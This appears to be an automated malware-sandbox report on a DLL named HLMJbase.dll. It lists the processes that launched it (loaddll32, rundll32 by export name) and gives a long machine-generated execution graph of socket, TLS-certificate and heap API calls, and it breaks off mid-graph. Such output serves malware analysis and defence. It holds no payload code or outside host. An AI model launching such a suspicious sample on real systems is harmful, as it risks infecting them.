00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii:


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:03:17:02
                      Start date:22/12/2024
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
                      Imagebase:0x9e0000
                      File size:126'464 bytes
                      MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:03:17:02
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:2
                      Start time:03:17:02
                      Start date:22/12/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:3
                      Start time:03:17:02
                      Start date:22/12/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
                      Imagebase:0xe0000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:03:17:02
                      Start date:22/12/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                      Imagebase:0xe0000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:5
                      Start time:03:17:05
                      Start date:22/12/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
                      Imagebase:0xe0000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:8
                      Start time:03:17:08
                      Start date:22/12/2024
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 724
                      Imagebase:0xb80000
                      File size:483'680 bytes
                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:3%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:17.8%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:124
                        execution_graph 77091 6cbb031b 77094 6cb87b12 77091->77094 77093 6cbb032e 77123 6cb89d2d 77094->77123 77099 6cb87c16 WSAGetLastError 77100 6cb87b8b 77099->77100 77101 6cb87e88 77100->77101 77102 6cbf7b7d 26 API calls 77100->77102 77103 6cb87e76 77100->77103 77104 6cb87e9a 77101->77104 77140 6cc022d0 26 API calls 77101->77140 77106 6cb87c80 getsockname 77102->77106 77139 6cc022d0 26 API calls 77103->77139 77107 6cb87eae 77104->77107 77141 6cb93f95 RtlFreeHeap 77104->77141 77109 6cb87cdd 77106->77109 77110 6cb87d62 WSAGetLastError 77106->77110 77107->77093 77109->77103 77112 6cb87d81 77109->77112 77114 6cb87d01 77109->77114 77122 6cb87e26 77109->77122 77110->77122 77112->77101 77112->77114 77113 6cb87ead 77113->77093 77117 6cb89d2d 26 API calls 77114->77117 77114->77122 77116 6cb87e65 77138 6cb87e9a RtlFreeHeap 77116->77138 77119 6cb87e15 77117->77119 77132 6cb87a23 77119->77132 77121 6cb87e6e 77121->77093 77137 6cb87e9a RtlFreeHeap 77122->77137 77142 6cb89d6f 77123->77142 77125 6cb89d3c 77126 6cb87b32 77125->77126 77147 6cc01e40 26 API calls 77125->77147 77128 6cbf7b7d 77126->77128 77129 6cbf7b89 77128->77129 77130 6cb87b47 getpeername 77128->77130 77160 6cc025b0 26 API calls 77129->77160 77130->77099 77130->77100 77133 6cb87a2d 77132->77133 77134 6cb87a27 77132->77134 77133->77122 77161 6cb9796c 77134->77161 77137->77116 77138->77121 77141->77113 77143 6cb89d85 77142->77143 77144 6cb89d75 77142->77144 77143->77125 77148 6cb65a90 77144->77148 77149 6cb65aa4 77148->77149 77150 6cb65a9b 77148->77150 77151 6cbf0110 3 API calls 77149->77151 77154 6cbf0110 77150->77154 77153 6cb65aa2 77151->77153 77153->77125 77155 6cbf011c RtlAllocateHeap 77154->77155 77156 6cbf0127 77154->77156 77155->77153 77159 6cc05070 GetProcessHeap HeapAlloc 77156->77159 77158 6cbf012c 77158->77153 77159->77158 77162 6cb97978 77161->77162 77163 6cb87a2c 77162->77163 77165 6cb65ad0 77162->77165 77163->77122 77166 6cb65ad5 77165->77166 77167 6cb65ad8 RtlFreeHeap 77165->77167 77166->77167 77167->77163 77168 6cbc396c 77184 6cbaff88 77168->77184 77171 6cbc3993 77186 6cbaffa1 RtlFreeHeap 77171->77186 77173 6cbc39a4 77187 6cb87a7b RtlFreeHeap 77173->77187 77175 6cbc39af 77188 6cbc39fa 77175->77188 77185 6cbaff8f DeleteSecurityContext 77184->77185 77185->77171 77186->77173 77187->77175 77189 6cbc3a07 77188->77189 77190 6cbba357 77188->77190 77191 6cbba365 DeleteSecurityContext 77190->77191 77192 6cbba37c 77191->77192 77205 6cbaffa1 RtlFreeHeap 77192->77205 77194 6cbba38d 77206 6cb87a7b RtlFreeHeap 77194->77206 77196 6cbba398 77207 6cbaffd1 55 API calls 77196->77207 77198 6cbba3a0 77208 6cb95758 RtlFreeHeap 77198->77208 77200 6cbba3ab 77209 6cb95758 RtlFreeHeap 77200->77209 77202 6cbba3b6 77210 6cb95758 RtlFreeHeap 77202->77210 77204 6cbba3c1 77205->77194 77206->77196 77207->77198 77208->77200 77209->77202 77210->77204 77211 6cbbb2fa 77212 6cbbb34e 77211->77212 77213 6cbbb2fe 77211->77213 77288 6cbb09d3 77213->77288 77217 6cbbb31a 77217->77212 77300 6cbad3b3 77217->77300 77219 6cbbb3e9 77304 6cb87564 77219->77304 77222 6cbbaab8 77225 6cbc2740 77222->77225 77226 6cbad3b3 2 API calls 77222->77226 77229 6cbc2752 77222->77229 77230 6cbbbaae 77222->77230 77231 6cb87564 26 API calls 77222->77231 77233 6cbc2764 77222->77233 77241 6cbbb57a memmove 77222->77241 77244 6cb87a23 RtlFreeHeap 77222->77244 77257 6cb9332d memcmp 77222->77257 77264 6cb87564 26 API calls 77222->77264 77268 6cc00595 memcmp 77222->77268 77269 6cbb3580 memcmp 77222->77269 77272 6cbbba25 77222->77272 77279 6cb9796c RtlFreeHeap 77222->77279 77285 6cb87a7b RtlFreeHeap 77222->77285 77309 6cbc8538 77222->77309 77316 6cb98227 77222->77316 77326 6cbb00a8 memmove 77222->77326 77362 6cbb0a13 27 API calls 77222->77362 77363 6cb6aee0 27 API calls 77222->77363 77364 6cc0062e memcmp 77222->77364 77365 6cbb3599 memcmp 77222->77365 77366 6cbe699a memcmp 77222->77366 77367 6cbb3970 RtlFreeHeap CertCloseStore 77222->77367 77369 6cbf7044 RtlFreeHeap 77222->77369 77370 6cba3e5e 56 API calls 77222->77370 77371 6cb982a2 28 API calls 77222->77371 77372 6cb89744 27 API calls 77222->77372 77373 6cbb381e RtlFreeHeap 77222->77373 77374 6cb98216 77222->77374 77395 6cbb4390 26 API calls 77222->77395 77396 6cbba798 54 API calls 77222->77396 77399 6cc022d0 26 API calls 77225->77399 77226->77222 77400 6cc022d0 26 API calls 77229->77400 77234 6cbbb391 memmove 77231->77234 77401 6cc022d0 26 API calls 77233->77401 77234->77222 77237 6cbc2776 77402 6cc022d0 26 API calls 77237->77402 77368 6cbb3814 RtlFreeHeap CertCloseStore 77241->77368 77244->77222 77245 6cbbb596 memmove 77246 6cbbb5c7 memmove 77245->77246 77247 6cbbba38 77245->77247 77246->77222 77397 6cbba417 28 API calls 77247->77397 77257->77222 77264->77222 77268->77222 77269->77222 77272->77237 77273 6cbbba2e 77272->77273 77273->77247 77275 6cbbbab9 77273->77275 77398 6cbac450 26 API calls 77275->77398 77279->77222 77285->77222 77289 6cbb09da 77288->77289 77290 6cbb0a01 77288->77290 77297 6cbb1676 77289->77297 77403 6cc025d0 77290->77403 77407 6cc00b07 77297->77407 77299 6cbb1683 77299->77217 77301 6cbad3ca 77300->77301 77410 6cbaf7c6 CertDuplicateStore CertDuplicateCertificateContext 77301->77410 77303 6cbad3d5 77303->77219 77305 6cb65a90 3 API calls 77304->77305 77306 6cb87574 77305->77306 77307 6cb87578 memmove 77306->77307 77411 6cc01e40 26 API calls 77306->77411 77307->77222 77310 6cbc856a 77309->77310 77314 6cbc8542 77309->77314 77312 6cb98227 2 API calls 77310->77312 77311 6cbc8567 77311->77222 77313 6cbc8572 77312->77313 77314->77311 77315 6cb65ad0 RtlFreeHeap 77314->77315 77315->77311 77317 6cb98232 77316->77317 77320 6cb9823a 77316->77320 77413 6cb8a6f6 RtlFreeHeap 77317->77413 77319 6cb9824a 77412 6cbe72dc CertCloseStore 77319->77412 77320->77319 77414 6cb99f82 RtlFreeHeap 77320->77414 77323 6cb9825f 77324 6cb9826f 77323->77324 77415 6cb9a320 RtlFreeHeap 77323->77415 77324->77222 77327 6cbb00cc memmove 77326->77327 77328 6cbb0132 77326->77328 77416 6cbaf807 77327->77416 77457 6cbefdd0 30 API calls __aulldiv 77328->77457 77331 6cbb0146 77334 6cbb016c 77331->77334 77335 6cbb0161 77331->77335 77332 6cbb00f7 77355 6cbb0100 77332->77355 77456 6cbafe05 RtlFreeHeap 77332->77456 77459 6cbf8c47 26 API calls 77334->77459 77458 6cbf8cfa 30 API calls 77335->77458 77338 6cbb016a memmove memmove 77460 6cbf75ae 26 API calls 77338->77460 77341 6cbb01ce 77461 6cbd7fd8 251 API calls 77341->77461 77343 6cbb01e1 77344 6cbb01ea 77343->77344 77345 6cbb022e 77343->77345 77462 6cbd841c RtlFreeHeap 77344->77462 77468 6cbb02ec RtlFreeHeap 77345->77468 77348 6cbb0202 77463 6cbf75ae 26 API calls 77348->77463 77350 6cbb0207 77351 6cbb0250 77350->77351 77354 6cbb0216 77350->77354 77355->77222 77362->77222 77363->77222 77364->77222 77365->77222 77366->77222 77367->77222 77368->77245 77369->77222 77370->77222 77372->77222 77373->77222 77375 6cb9821c 77374->77375 77376 6cb98226 77374->77376 77375->77376 77377 6cb9a4c6 77375->77377 77378 6cb9a438 77375->77378 77390 6cb65ad0 RtlFreeHeap 77375->77390 77376->77222 77382 6cb9a524 77377->77382 77389 6cb9a547 77377->77389 78986 6cbdf820 26 API calls 77377->78986 77378->77377 77379 6cb65ad0 RtlFreeHeap 77378->77379 77379->77377 77380 6cb9a5fb 78992 6cb87a7b RtlFreeHeap 77380->78992 78987 6cb808f0 RtlFreeHeap 77382->78987 77383 6cb9a61b 77386 6cb9a630 77383->77386 77392 6cb65ad0 RtlFreeHeap 77383->77392 77385 6cb9a57a 78991 6cb808f0 RtlFreeHeap 77385->78991 77386->77222 77389->77380 77389->77385 78988 6cbdf840 RtlFreeHeap 77389->78988 78989 6cbdf869 RtlFreeHeap 77389->78989 78990 6cb91a80 RtlFreeHeap 77389->78990 77390->77375 77392->77386 77395->77222 77396->77222 77406 6cc02230 26 API calls 77403->77406 77408 6cc00b21 77407->77408 77409 6cc00b0d memcmp 77407->77409 77408->77299 77409->77299 77410->77303 77412->77323 77413->77320 77414->77319 77415->77324 77417 6cbaf825 77416->77417 77422 6cbaf838 77416->77422 77418 6cbaf953 77417->77418 77477 6cc02860 77417->77477 77473 6cbc30b2 77418->77473 77421 6cbaf8e6 77481 6cbaf7c6 CertDuplicateStore CertDuplicateCertificateContext 77421->77481 77422->77421 77479 6cbacbf0 26 API calls 77422->77479 77426 6cbaf98a memmove 77428 6cb9796c RtlFreeHeap 77426->77428 77427 6cbaf97f 77427->77332 77431 6cbaf9c3 77428->77431 77429 6cbaf8db 77429->77421 77480 6cba4fb4 27 API calls 77429->77480 77430 6cbaf8f9 77482 6cbb916d 30 API calls 77430->77482 77433 6cbaf9c8 77431->77433 77434 6cbaf9d7 memmove 77431->77434 77456->77355 77457->77331 77458->77338 77459->77338 77460->77341 77461->77343 77462->77348 77463->77350 77494 6cbb94f3 77473->77494 77609 6cbb94a2 77473->77609 77474 6cbaf977 77474->77426 77474->77427 78984 6cc02230 26 API calls 77477->78984 77479->77429 77480->77421 77481->77430 77482->77418 77495 6cc02860 26 API calls 77494->77495 77496 6cbb94fd 77495->77496 77599 6cbf849d 28 API calls 77496->77599 77723 6cba12db 77496->77723 77834 6cba1861 77496->77834 77896 6cbf7ef1 77496->77896 77975 6cba1157 77496->77975 78104 6cba130b 77496->78104 78215 6cba186f 77496->78215 78283 6cb9588c getsockopt 77496->78283 78286 6cba131c 77496->78286 78397 6cba126c 77496->78397 78427 6cbe76b7 connect 77496->78427 78430 6cba1182 77496->78430 77497 6cbb9512 77498 6cb9796c RtlFreeHeap 77497->77498 77580 6cbb951c 77497->77580 77499 6cbb955c 77498->77499 77500 6cbb9565 77499->77500 77501 6cbb9594 77499->77501 78556 6cba10af 26 API calls 77500->78556 77503 6cbba27a 77501->77503 77504 6cbb971a 77501->77504 77506 6cbb9570 77501->77506 77505 6cc025d0 26 API calls 77503->77505 78557 6cbe6a27 27 API calls 77504->78557 77507 6cbba28c 77505->77507 78602 6cb95758 RtlFreeHeap 77506->78602 77512 6cbba0e8 memmove 77512->77580 77513 6cbb9779 77580->77474 77599->77497 77610 6cbb9503 77609->77610 77711 6cba12db 93 API calls 77610->77711 77712 6cba130b 93 API calls 77610->77712 77713 6cbf849d 28 API calls 77610->77713 77714 6cb9588c 2 API calls 77610->77714 77715 6cba186f 84 API calls 77610->77715 77716 6cba126c 80 API calls 77610->77716 77717 6cba131c 93 API calls 77610->77717 77718 6cba1182 96 API calls 77610->77718 77719 6cbe76b7 2 API calls 77610->77719 77720 6cba1861 82 API calls 77610->77720 77721 6cba1157 96 API calls 77610->77721 77722 6cbf7ef1 67 API calls 77610->77722 77611 6cbb9512 77612 6cb9796c RtlFreeHeap 77611->77612 77694 6cbb951c 77611->77694 77613 6cbb955c 77612->77613 77614 6cbb9565 77613->77614 77615 6cbb9594 77613->77615 78958 6cba10af 26 API calls 77614->78958 77617 6cbba27a 77615->77617 77618 6cbb971a 77615->77618 77620 6cbb9570 77615->77620 77619 6cc025d0 26 API calls 77617->77619 78959 6cbe6a27 27 API calls 77618->78959 77621 6cbba28c 77619->77621 78983 6cb95758 RtlFreeHeap 77620->78983 77626 6cbba0e8 memmove 77626->77694 77627 6cbb9779 77694->77474 77711->77611 77712->77611 77713->77611 77714->77611 77715->77611 77716->77611 77717->77611 77718->77611 77719->77611 77720->77611 77721->77611 77722->77611 77724 6cba1476 77723->77724 77725 6cb9796c RtlFreeHeap 77724->77725 77787 6cba14d6 77724->77787 77726 6cba152f 77725->77726 78603 6cba29bb 77726->78603 77732 6cba1858 77787->77497 77835 6cba1d01 77834->77835 77836 6cba20f9 77835->77836 78727 6cbd8dc4 46 API calls 77835->78727 77838 6cc025d0 26 API calls 77836->77838 77840 6cba210b 77838->77840 77841 6cc02860 26 API calls 77840->77841 77842 6cba2115 77841->77842 77845 6cc02860 26 API calls 77842->77845 78734 6cbf7a3e 77896->78734 77976 6cba1170 77975->77976 77977 6cba1167 77975->77977 77980 6cba11e5 77976->77980 78814 6cbacbf0 26 API calls 77976->78814 77977->77976 77978 6cba20d3 77977->77978 77979 6cc02860 26 API calls 77978->77979 77982 6cba20dd 77979->77982 77981 6cba11e9 77980->77981 78815 6cb8042b 27 API calls 77980->78815 78817 6cba2974 27 API calls 77981->78817 78837 6cc022d0 26 API calls 77982->78837 77988 6cba120d 77988->77981 77991 6cba1211 77988->77991 78816 6cb83ca2 27 API calls 77991->78816 77995 6cba1226 78010 6cba122f 77995->78010 78000 6cb98282 RtlFreeHeap 78025 6cba14e7 78010->78025 78040 6cba1375 78010->78040 78819 6cb6afd0 78010->78819 78029 6cba162a 78025->78029 78030 6cba1659 78025->78030 78040->78000 78064 6cba14d6 78040->78064 78064->77497 78105 6cba14bd 78104->78105 78106 6cb9796c RtlFreeHeap 78105->78106 78129 6cba14d6 78105->78129 78107 6cba152f 78106->78107 78108 6cba29bb RtlFreeHeap 78107->78108 78109 6cba1540 78108->78109 78113 6cba1858 78109->78113 78873 6cba2974 27 API calls 78109->78873 78111 6cba1556 78111->78113 78115 6cba1f3a 78113->78115 78116 6cba1f4f 78113->78116 78129->77497 78216 6cba1c13 78215->78216 78217 6cba1880 78215->78217 78894 6cbd8dc4 46 API calls 78216->78894 78220 6cc025d0 26 API calls 78217->78220 78221 6cba210b 78220->78221 78224 6cc02860 26 API calls 78221->78224 78225 6cba2115 78224->78225 78228 6cc02860 26 API calls 78225->78228 78232 6cba211f 78228->78232 78284 6cb958c9 WSAGetLastError 78283->78284 78285 6cb958b9 78283->78285 78284->78285 78285->77497 78287 6cba148e 78286->78287 78288 6cb9796c RtlFreeHeap 78287->78288 78310 6cba14d6 78287->78310 78289 6cba152f 78288->78289 78290 6cba29bb RtlFreeHeap 78289->78290 78291 6cba1540 78290->78291 78295 6cba1858 78291->78295 78901 6cba2974 27 API calls 78291->78901 78297 6cba1f3a 78295->78297 78298 6cba1f4f 78295->78298 78310->77497 78398 6cba128b 78397->78398 78399 6cc02860 26 API calls 78398->78399 78400 6cba2129 78399->78400 78401 6cba26f3 78400->78401 78402 6cba2174 78400->78402 78403 6cba26ff 78401->78403 78923 6cb958f1 27 API calls 78401->78923 78405 6cb8b679 43 API calls 78402->78405 78925 6cba2ad4 57 API calls 78403->78925 78407 6cba21e5 78405->78407 78406 6cba27a0 78924 6cb8b449 27 API calls 78406->78924 78410 6cba272f 78407->78410 78411 6cba21f5 memmove 78407->78411 78411->78410 78412 6cba27ce 78428 6cbe76dd 78427->78428 78429 6cbe76d0 GetLastError 78427->78429 78428->77497 78429->78428 78431 6cba11ad 78430->78431 78432 6cba11e5 78431->78432 78928 6cbacbf0 26 API calls 78431->78928 78433 6cba11e9 78432->78433 78929 6cb8042b 27 API calls 78432->78929 78931 6cba2974 27 API calls 78433->78931 78437 6cba120d 78437->78433 78438 6cba1211 78437->78438 78930 6cb83ca2 27 API calls 78438->78930 78440 6cba1226 78445 6cba122f 78440->78445 78442 6cb98282 RtlFreeHeap 78446 6cb6afd0 27 API calls 78445->78446 78448 6cba14e7 78445->78448 78547 6cba1375 78445->78547 78502 6cba14d6 78502->77497 78547->78442 78547->78502 78556->77506 78557->77513 78602->77512 78604 6cba29f2 78603->78604 78605 6cba29c6 78603->78605 78678 6cba2c76 RtlFreeHeap 78604->78678 78607 6cba1540 78605->78607 78608 6cba29db 78605->78608 78609 6cb9796c RtlFreeHeap 78605->78609 78607->77732 78649 6cba2974 27 API calls 78607->78649 78608->78607 78677 6cba2c76 RtlFreeHeap 78608->78677 78609->78608 78677->78607 78678->78607 78735 6cbf7511 26 API calls 78734->78735 78736 6cbf7a48 78735->78736 78738 6cbf7a53 78736->78738 78790 6cbf76c0 78736->78790 78740 6cbf7a6b 78738->78740 78794 6cc04295 26 API calls 78738->78794 78741 6cbfa44b 78740->78741 78742 6cbfa457 78741->78742 78743 6cbfa451 78741->78743 78791 6cbf76c9 78790->78791 78792 6cbf76d2 78790->78792 78791->78738 78795 6cc024a0 26 API calls 78792->78795 78814->77980 78815->77988 78816->77995 78817->78010 78845 6cb6aae0 78819->78845 78873->78111 78923->78406 78924->78403 78925->78412 78928->78432 78929->78437 78930->78440 78931->78445 78958->77620 78959->77627 78983->77626 78986->77377 78987->77389 78989->77389 78990->77389 78991->77380 78992->77383 78993 6cbd6d3c 78999 6cbd6d7f 78993->78999 79003 6cbd7756 78999->79003 79006 6cbd73e9 AcceptSecurityContext 78999->79006 79007 6cbd6f27 CertGetCertificateChain 78999->79007 79010 6cbd7458 InitializeSecurityContextW 78999->79010 79011 6cbe7325 CertEnumCertificatesInStore CertDuplicateCertificateContext 78999->79011 79014 6cbd7107 CertVerifyCertificateChainPolicy 78999->79014 79015 6cbd74c0 FreeContextBuffer 78999->79015 79018 6cbd720f CertFreeCertificateChain 78999->79018 79019 6cbd778c 78999->79019 79020 6cbd76f1 CertFreeCertificateChain 78999->79020 79022 6cbd6977 26 API calls 78999->79022 79027 6cbd6ed3 CertFreeCertificateContext CertFreeCertificateContext 78999->79027 79028 6cbd770a 78999->79028 79030 6cbd79f5 27 API calls 78999->79030 79031 6cbd70c6 CertFreeCertificateChain 78999->79031 79036 6cbb1676 memcmp 78999->79036 79038 6cbd7809 78999->79038 79045 6cbe72af QueryContextAttributesW 78999->79045 79047 6cbe7397 78999->79047 79050 6cbd6924 78999->79050 79053 6cbdecc8 26 API calls 78999->79053 79054 6cbd69f7 RtlFreeHeap 78999->79054 79055 6cbe72ee CertAddCertificateContextToStore GetLastError 78999->79055 79056 6cbe72dc CertCloseStore 78999->79056 79057 6cbe6d4b CertDuplicateCertificateChain CertFreeCertificateChain CertFreeCertificateChain 78999->79057 79058 6cbe6ddc CertDuplicateCertificateContext 78999->79058 79059 6cbb0bd1 RtlFreeHeap 78999->79059 79060 6cbd78cd 52 API calls 78999->79060 79061 6cbe6f4b 29 API calls 78999->79061 79062 6cbd6939 26 API calls 78999->79062 79063 6cbe6438 27 API calls 78999->79063 79064 6cbe6438 27 API calls 78999->79064 79065 6cbd696c RtlFreeHeap 78999->79065 79066 6cb7a132 RtlFreeHeap 78999->79066 79067 6cbe725d QueryContextAttributesW 78999->79067 79068 6cb958f1 27 API calls 79003->79068 79006->78999 79007->78999 79009 6cbd705f GetLastError 79007->79009 79009->78999 79010->78999 79011->78999 79014->78999 79016 6cbd71da GetLastError 79014->79016 79015->78999 79016->79018 79018->78999 79069 6cbd696c RtlFreeHeap 79019->79069 79020->78999 79022->78999 79025 6cbd7799 79070 6cb7a132 RtlFreeHeap 79025->79070 79027->78999 79030->78999 79031->78999 79034 6cbd7563 FreeContextBuffer 79034->78999 79036->78999 79037 6cbd75f4 FreeContextBuffer 79037->78999 79040 6cbd7836 79038->79040 79041 6cbd78bb 79040->79041 79044 6cbd78a0 79040->79044 79071 6cbd6a0c 40 API calls 79040->79071 79072 6cbf8739 79040->79072 79084 6cc022d0 26 API calls 79041->79084 79044->78999 79046 6cbe72c6 79045->79046 79046->78999 79048 6cbe739c CertDuplicateStore 79047->79048 79049 6cbe73aa 79047->79049 79048->79049 79049->78999 79115 6cbd58cd 79050->79115 79053->78999 79054->78999 79055->78999 79056->79007 79057->78999 79058->78999 79059->78999 79060->78999 79061->78999 79062->78999 79063->79034 79064->79037 79065->78999 79066->78999 79067->78999 79068->79028 79069->79025 79070->79028 79071->79040 79081 6cbf876e 79072->79081 79074 6cbf87ad send 79076 6cbf87d1 WSAGetLastError 79074->79076 79074->79081 79075 6cbf88d1 79091 6cc025b0 26 API calls 79075->79091 79076->79081 79078 6cbf88a7 79078->79040 79081->79074 79081->79075 79081->79078 79083 6cb95588 RtlFreeHeap 79081->79083 79085 6cbf7ee3 79081->79085 79088 6cb94da7 35 API calls 79081->79088 79089 6cbf7cef 26 API calls 79081->79089 79090 6cb87fe5 RtlFreeHeap 79081->79090 79083->79081 79092 6cbf7d41 79085->79092 79088->79081 79089->79081 79090->79081 79103 6cbc675a 79092->79103 79095 6cbf7d5b 79095->79081 79096 6cbf7d95 79099 6cbf7e8f 79096->79099 79109 6cb958f1 27 API calls 79096->79109 79097 6cba51a8 40 API calls 79101 6cbf7dc2 79097->79101 79110 6cbf79d5 26 API calls 79099->79110 79108 6cba5199 39 API calls 79101->79108 79111 6cbf755c 79103->79111 79106 6cbc6772 79106->79095 79106->79096 79106->79097 79108->79096 79109->79099 79110->79095 79112 6cbf7511 26 API calls 79111->79112 79113 6cbc6760 79112->79113 79113->79106 79114 6cbf79d5 26 API calls 79113->79114 79114->79106 79118 6cb8733e 79115->79118 79119 6cb8735d 79118->79119 79121 6cb8734a 79118->79121 79124 6cc02550 26 API calls 79119->79124 79120 6cb87352 79120->78999 79121->79120 79125 6cc02270 26 API calls 79121->79125 79126 6cb94268 79127 6cb87584 2 API calls 79126->79127 79156 6cb94285 79127->79156 79129 6cb94612 79131 6cc025d0 26 API calls 79129->79131 79170 6cc024e0 26 API calls 79129->79170 79130 6cb87584 2 API calls 79130->79156 79131->79129 79132 6cb94486 79132->79129 79146 6cb944b6 79132->79146 79163 6cb94f03 27 API calls 79132->79163 79134 6cb9459b 79167 6cb946f5 27 API calls 79134->79167 79135 6cb943bb NtDeviceIoControlFile 79135->79156 79138 6cb945a7 79168 6cb947fc WakeByAddressSingle 79138->79168 79139 6cb9454e 79139->79134 79143 6cb94575 79139->79143 79165 6cb94e44 29 API calls 79139->79165 79141 6cb94403 RtlNtStatusToDosError 79141->79156 79166 6cb94e44 29 API calls 79143->79166 79146->79129 79146->79139 79150 6cb94686 79146->79150 79152 6cb94698 79146->79152 79164 6cb94f03 27 API calls 79146->79164 79147 6cb945ba 79171 6cc022d0 26 API calls 79150->79171 79151 6cb94447 79169 6cb947fc WakeByAddressSingle 79151->79169 79172 6cc022d0 26 API calls 79152->79172 79156->79129 79156->79130 79156->79132 79156->79135 79156->79141 79156->79151 79158 6cb93f95 RtlFreeHeap 79156->79158 79159 6cb93edc 28 API calls 79156->79159 79160 6cb95588 RtlFreeHeap 79156->79160 79161 6cb93eaa 28 API calls 79156->79161 79162 6cb947fc WakeByAddressSingle 79156->79162 79158->79156 79159->79156 79160->79156 79161->79156 79162->79156 79163->79132 79164->79146 79165->79143 79166->79134 79167->79138 79168->79147 79169->79138 79173 6cb65af0 79174 6cb65b16 79173->79174 79175 6cb65b04 RtlReAllocateHeap 79173->79175 79176 6cbf0110 3 API calls 79174->79176 79177 6cb65b5d 79175->79177 79178 6cb65b26 79176->79178 79178->79177 79179 6cb65b2a memmove HeapFree 79178->79179 79179->79177 79180 6cbda84b 79218 6cbda6dc 79180->79218 79182 6cbdb934 79519 6cc05614 26 API calls 79182->79519 79183 6cbda846 79518 6cc05640 26 API calls 79183->79518 79184 6cbf58ee 26 API calls 79184->79218 79189 6cbdb96c 79521 6cc02820 26 API calls 79189->79521 79191 6cbf7511 26 API calls 79191->79218 79193 6cba51a8 40 API calls 79193->79218 79194 6cbdb107 79196 6cbdb118 79194->79196 79497 6cbdebc7 46 API calls 79194->79497 79208 6cbdb329 79196->79208 79515 6cbdeba3 45 API calls 79196->79515 79198 6cbdac01 79198->79208 79374 6cbe92c0 79198->79374 79201 6cbdb15e 79516 6cbdeb3b 48 API calls 79201->79516 79207 6cbdb16a 79517 6cbf76dc 45 API calls 79207->79517 79522 6cc02230 26 API calls 79208->79522 79523 6cc01e20 26 API calls 79208->79523 79211 6cbdac67 79383 6cbf7abd 79211->79383 79218->79182 79218->79183 79218->79184 79218->79191 79218->79193 79218->79194 79218->79198 79228 6cba5199 39 API calls 79218->79228 79334 6cbdb8d1 79218->79334 79482 6cbf8f5e 26 API calls 79218->79482 79483 6cbdbd08 91 API calls 79218->79483 79484 6cbd8459 26 API calls 79218->79484 79485 6cbf907f 26 API calls 79218->79485 79486 6cbf5622 26 API calls 79218->79486 79487 6cbdebc7 46 API calls 79218->79487 79228->79218 79231 6cbf7511 26 API calls 79235 6cbdaca4 79231->79235 79238 6cbdba15 79235->79238 79360 6cbdacac 79235->79360 79524 6cbdbc6c 26 API calls 79238->79524 79251 6cbdb11a 79259 6cbdbcd2 26 API calls 79251->79259 79265 6cbdb12f 79259->79265 79498 6cbdbce7 79265->79498 79268 6cbf88dd 40 API calls 79268->79360 79273 6cbdb13a 79514 6cbdebc7 46 API calls 79273->79514 79297 6cbd8459 26 API calls 79297->79360 79301 6cbdbce7 26 API calls 79301->79360 79311 6cbf7511 26 API calls 79311->79360 79520 6cc024e0 26 API calls 79334->79520 79337 6cbdbcd2 26 API calls 79337->79360 79353 6cbf91a3 26 API calls 79353->79360 79357 6cbdbcf0 26 API calls 79357->79360 79360->79189 79360->79251 79360->79268 79360->79297 79360->79301 79360->79311 79360->79334 79360->79337 79360->79353 79360->79357 79396 6cb9fe28 79360->79396 79399 6cba07f2 79360->79399 79421 6cb9fd9e 79360->79421 79443 6cb9fb0a 79360->79443 79465 6cb9fe71 79360->79465 79471 6cb9fe31 79360->79471 79477 6cb9fe16 79360->79477 79489 6cbdbd08 91 API calls 79360->79489 79490 6cbf3877 26 API calls 79360->79490 79491 6cbf941b 58 API calls 79360->79491 79492 6cbf79f4 26 API calls 79360->79492 79493 6cbf93de 58 API calls 79360->79493 79494 